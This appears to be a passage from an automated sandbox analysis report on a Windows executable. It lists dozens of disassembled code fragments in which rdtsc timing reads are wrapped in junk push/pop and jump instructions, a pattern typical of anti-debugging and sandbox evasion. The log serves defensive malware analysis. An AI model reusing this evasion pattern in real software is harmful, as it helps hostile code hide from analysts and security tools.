Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04B5D second address: F04BE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007F8C7D0F0871h 0x00000010 nop 0x00000011 mov dword ptr [ebp+12462B05h], edi 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push ecx 0x0000001f mov edi, dword ptr [ebp+122D1B8Ch] 0x00000025 pop ebx 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F8C7D0F0868h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 mov bl, ch 0x00000049 mov eax, dword ptr [ebp+122D14D9h] 0x0000004f xor dword ptr [ebp+122D2072h], edi 0x00000055 push FFFFFFFFh 0x00000057 mov ebx, dword ptr [ebp+12456225h] 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F08A86 second address: F08A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8C7D0F21C6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F019E8 second address: F01A90 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8C7D0F0868h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007F8C7D0F0873h 0x00000012 add dword ptr [ebp+122D1D25h], eax 0x00000018 pop ebx 0x00000019 push dword ptr fs:[00000000h] 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F8C7D0F0868h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a movsx ebx, cx 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 add bx, 7136h 0x00000049 mov eax, dword ptr [ebp+122D0B11h] 0x0000004f sub dword ptr [ebp+122D1A6Eh], esi 0x00000055 movsx ebx, bx 0x00000058 push FFFFFFFFh 0x0000005a jmp 00007F8C7D0F0878h 0x0000005f call 00007F8C7D0F0870h 0x00000064 mov dword ptr [ebp+122D331Fh], edx 0x0000006a pop ebx 0x0000006b nop 0x0000006c push eax 0x0000006d push edx 0x0000006e jno 00007F8C7D0F0868h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F01A90 second address: F01ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c js 00007F8C7D0F21CCh 0x00000012 ja 00007F8C7D0F21C6h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8C7D0F21D2h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F01ABC second address: F01AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F06D2D second address: F06D32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F07BBD second address: F07BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F08C26 second address: F08C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F08D55 second address: F08D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F11544 second address: F11548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F11548 second address: F11554 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F11554 second address: F1155A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1155A second address: F11580 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8C7D0F0866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8C7D0F0877h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F10FDD second address: F10FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F10FE4 second address: F10FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F8C7D0F0866h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F10FF1 second address: F10FFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8C7D0F21C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F10FFB second address: F10FFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA6776 second address: EA678B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F8C7D0F21CEh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F16EA5 second address: F16EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F16FE0 second address: F16FF9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C7D0F21C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007F8C7D0F21C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F16FF9 second address: F16FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F16FFD second address: F17003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F17003 second address: F1700D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8C7D0F0866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1C9F9 second address: F1CA07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F8C7D0F21C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1CA07 second address: F1CA25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0878h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1BEF6 second address: F1BEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1BEFC second address: F1BF00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1BF00 second address: F1BF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1BF06 second address: F1BF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F8C7D0F086Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1C1F3 second address: F1C200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F8C7D0F21CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1C200 second address: F1C220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F0878h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1C603 second address: F1C607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF31C6 second address: EF31CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF31CA second address: EF31DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF33D0 second address: EF33D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF33D4 second address: EF33DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF33DA second address: EF33E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF33E0 second address: EF33E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF373D second address: EF375C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF375C second address: EF3794 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000004h 0x0000000c mov dword ptr [ebp+122D1CFBh], edi 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007F8C7D0F21DBh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF3B46 second address: EF3B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF3B4A second address: EF3B57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF3CF4 second address: EF3CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F20265 second address: F202B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D3h 0x00000007 jmp 00007F8C7D0F21CEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F8C7D0F21D1h 0x00000014 push edx 0x00000015 jmp 00007F8C7D0F21D3h 0x0000001a pop edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F203E0 second address: F203E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F203E8 second address: F203ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F203ED second address: F20423 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0877h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8C7D0F0879h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F206CE second address: F206D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F206D5 second address: F20729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007F8C7D0F0866h 0x00000009 jne 00007F8C7D0F0866h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jmp 00007F8C7D0F086Dh 0x0000001a pop esi 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F8C7D0F0874h 0x00000023 jmp 00007F8C7D0F0879h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2088D second address: F20895 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F20B00 second address: F20B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F20B06 second address: F20B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F20B0A second address: F20B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8C7D0F0870h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F23E5B second address: F23E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007F8C7D0F21C6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8C7D0F21D3h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F23E87 second address: F23E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F29201 second address: F2920B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8C7D0F21C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2920B second address: F29211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F29211 second address: F29228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C7D0F21D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F29228 second address: F29245 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0876h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F29245 second address: F2924B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F29AD1 second address: F29AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8C7D0F0873h 0x0000000a jmp 00007F8C7D0F086Bh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F8C7D0F0868h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F29AFF second address: F29B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8C7D0F21D5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F29B28 second address: F29B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F29C52 second address: F29C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F8C7D0F21D6h 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F29C6F second address: F29CA0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C7D0F0875h 0x00000008 jmp 00007F8C7D0F086Fh 0x0000000d jmp 00007F8C7D0F086Ah 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jg 00007F8C7D0F0880h 0x0000001a jc 00007F8C7D0F086Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F28EAB second address: F28EC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8C7D0F21CFh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F28EC1 second address: F28ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F8C7D0F086Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F34284 second address: F342A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jp 00007F8C7D0F21D6h 0x0000000d jmp 00007F8C7D0F21D0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3301F second address: F33027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F33027 second address: F33050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21CAh 0x00000007 jmp 00007F8C7D0F21D3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007F8C7D0F21D2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F33050 second address: F33056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F332FF second address: F3331A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F21D5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3331A second address: F33340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8C7D0F0866h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jns 00007F8C7D0F0866h 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007F8C7D0F086Fh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F335FE second address: F33602 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F33DAD second address: F33DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F33DB3 second address: F33DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F372D4 second address: F372DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F36B85 second address: F36B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F36F94 second address: F36FAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F8C7D0F0866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F8C7D0F0866h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F36FAA second address: F36FAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F36FAE second address: F36FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F36FB9 second address: F36FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3D037 second address: F3D048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F8C7D0F086Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F433CE second address: F433E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8C7D0F21C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F433E7 second address: F433EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F41CEE second address: F41D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 jmp 00007F8C7D0F21D3h 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F41D0B second address: F41D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F41ED1 second address: F41ED7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F42159 second address: F42191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F0878h 0x00000009 popad 0x0000000a pushad 0x0000000b jng 00007F8C7D0F086Eh 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F42191 second address: F42195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F42797 second address: F4279D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F43150 second address: F4315F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8C7D0F21C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F495E2 second address: F495FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8C7D0F0866h 0x0000000a popad 0x0000000b jmp 00007F8C7D0F086Fh 0x00000010 rdtsc
